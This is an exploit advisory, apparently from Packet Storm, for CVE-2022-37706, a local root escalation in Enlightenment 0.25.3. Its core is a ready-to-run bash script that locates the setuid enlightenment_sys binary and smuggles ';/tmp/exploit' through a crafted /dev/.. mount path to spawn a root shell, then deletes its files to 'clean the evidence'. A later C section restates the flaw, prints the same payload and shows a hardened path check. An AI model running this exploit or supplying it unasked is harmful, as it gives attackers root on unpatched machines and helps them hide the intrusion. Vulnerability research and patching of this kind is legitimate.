Enlightenment 0.25.3 Privilege Escalation

27 Dec 2022 | Reported by nu11secur1ty | Type: packetstorm | Source: packetstormsecurity.com

Enlightenment Version 0.25.3 LPE, CRITICAL Vulnerability, Local Privilege Escalation

## Title: Enlightenment Version: 0.25.3 LPE  
## Author: nu11secur1ty  
## Date: 12.26.2022  
## Vendor: https://www.enlightenment.org/  
## Software: https://www.enlightenment.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706  
  
## Description:  
Enlightenment 0.25.3 is vulnerable to local privilege escalation.  
enlightenment_sys in Enlightenment before 0.25.4 allows local users to  
gain privileges because it is setuid root, and the system() library  
function mishandles pathnames that begin with a /dev/.. substring.  
An attacker with local access to a machine on which Enlightenment is  
installed can use this vulnerability to obtain a root shell.  
  
## STATUS: CRITICAL Vulnerability  
  
## Tested on:  
```bash  
DISTRIB_ID=Ubuntu  
DISTRIB_RELEASE=22.10  
DISTRIB_CODENAME=kinetic  
DISTRIB_DESCRIPTION="Ubuntu 22.10"  
PRETTY_NAME="Ubuntu 22.10"  
NAME="Ubuntu"  
VERSION_ID="22.10"  
VERSION="22.10 (Kinetic Kudu)"  
VERSION_CODENAME=kinetic  
ID=ubuntu  
ID_LIKE=debian  
HOME_URL="https://www.ubuntu.com/"  
SUPPORT_URL="https://help.ubuntu.com/"  
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"  
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"  
UBUNTU_CODENAME=kinetic  
LOGO=ubuntu-logo  
```  
  
[+] Exploit:  
  
```bash  
#!/usr/bin/bash  
# Idea by MaherAzzouz  
# Development by nu11secur1ty  
  
echo "CVE-2022-37706"  
echo "[*] Trying to find the vulnerable SUID file..."  
echo "[*] This may take few seconds..."  
  
# The actual problem  
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)  
if [[ -z ${file} ]]  
then  
echo "[-] Couldn't find the vulnerable SUID file..."  
echo "[*] Enlightenment should be installed on your system."  
exit 1  
fi  
  
echo "[+] Vulnerable SUID binary found!"  
echo "[+] Trying to pop a root shell!"  
mkdir -p /tmp/net  
mkdir -p "/dev/../tmp/;/tmp/exploit"  
  
echo "/bin/sh" > /tmp/exploit  
chmod a+x /tmp/exploit  
echo "[+] Welcome to the rabbit hole :)"  
  
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net  
  
read -p "Press any key to clean the evidence..."  
echo -e "Please wait... "  
  
sleep 5  
rm -rf /tmp/exploit  
rm -rf /tmp/net  
echo -e "Done; Everything is clear ;)"  
  
```  
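The bug class described above, as an added example written for this page (it is not Enlightenment's own source, and all function names are hypothetical): a minimal model of a setuid helper that validates a device path only by its "/dev/" prefix and then hands it to system(3), next to a hardened variant that validates the path lexically, resolves it with realpath(3) and builds an argv vector for execv(2) instead of a shell command line. The only input is the constructed device argument the exploit script above passes.

```c
#define _XOPEN_SOURCE 700   /* declares realpath(3) under strict C standards */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* ---- vulnerable pattern (illustrative, hypothetical names) ------------- */

/* Prefix-only validation: "/dev/../tmp/;/tmp/exploit" passes. */
int vulnerable_dev_check(const char *dev)
{
    return strncmp(dev, "/dev/", 5) == 0 ? 0 : -1;
}

/* Builds the line a system(3) call would hand to /bin/sh. The shell parses
 * it, so a ';' inside dev ends the mount command and starts a second one. */
int vulnerable_build_cmd(const char *dev, const char *target,
                         char *out, size_t outlen)
{
    if (vulnerable_dev_check(dev) != 0)
        return -1;
    snprintf(out, outlen, "/bin/mount -o nosuid,nodev,noexec %s %s", dev, target);
    return 0;
}

/* ---- hardened pattern --------------------------------------------------- */

/* Lexical validation: required prefix, a conservative character allow-list
 * (nothing shell-significant survives) and no "." / ".." / empty path
 * components (the prefix cannot be escaped by traversal). */
int hardened_dev_check(const char *dev)
{
    static const char allowed[] = "abcdefghijklmnopqrstuvwxyz"
                                  "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789/_-.";
    const char *p;

    if (strncmp(dev, "/dev/", 5) != 0)
        return -1;                               /* wrong prefix */
    if (strspn(dev, allowed) != strlen(dev))
        return -2;                               /* ';', ' ', '$', '`', ... */
    for (p = dev + 1; ; p++) {                   /* walk '/'-separated parts */
        const char *seg = p;
        size_t len;
        while (*p && *p != '/')
            p++;
        len = (size_t)(p - seg);
        if (len == 0 || (len == 1 && seg[0] == '.') ||
            (len == 2 && seg[0] == '.' && seg[1] == '.'))
            return -3;                           /* traversal or empty part */
        if (*p == '\0')
            break;
    }
    return 0;
}

/* Runtime check a real helper adds after the lexical one: resolve the path
 * and require it to still live under /dev and to be a block device. A path
 * that does not exist fails closed (returns 0). */
int hardened_is_block_device(const char *dev)
{
    char resolved[PATH_MAX];
    struct stat st;

    if (hardened_dev_check(dev) != 0 || realpath(dev, resolved) == NULL)
        return 0;
    if (strncmp(resolved, "/dev/", 5) != 0 || stat(resolved, &st) != 0)
        return 0;
    return S_ISBLK(st.st_mode) ? 1 : 0;
}

/* Argument vector for execv(2) instead of a shell string: each element is
 * exactly one argument, so metacharacters in dev cannot start a command. */
int hardened_build_argv(const char *dev, const char *target,
                        const char *vec[], size_t n)
{
    if (n < 6 || hardened_dev_check(dev) != 0)
        return -1;
    vec[0] = "/bin/mount";
    vec[1] = "-o";
    vec[2] = "nosuid,nodev,noexec";
    vec[3] = dev;
    vec[4] = target;
    vec[5] = NULL;
    return 0;
}

int main(void)
{
    /* Constructed input: the device argument the exploit script passes. */
    const char *payload = "/dev/../tmp/;/tmp/exploit";
    char cmdbuf[256];
    const char *vec[6];

    if (vulnerable_build_cmd(payload, "/tmp///net", cmdbuf, sizeof cmdbuf) == 0)
        printf("vulnerable helper would system(\"%s\")\n", cmdbuf);
    printf("hardened_dev_check(payload)   = %d\n", hardened_dev_check(payload));
    printf("hardened_dev_check(/dev/sda1) = %d\n", hardened_dev_check("/dev/sda1"));
    if (hardened_build_argv("/dev/sda1", "/mnt/usb", vec, 6) == 0)
        printf("hardened helper would execv(%s) with argv[3]=%s\n", vec[0], vec[3]);
    return 0;
}
```

The vulnerable branch reproduces the advisory's point: the prefix test accepts the payload and the resulting string contains ";/tmp/exploit", which /bin/sh runs as a separate command with the helper's root privileges. The hardened branch rejects the same payload on the character allow-list alone, would reject "/dev/../sda1" on the component walk, and never lets a shell parse the arguments at all.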
  
## Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706  
## Proof and Exploit:  
https://streamable.com/zflbgg  
  
## Time spent  
`01:00:00`  
  
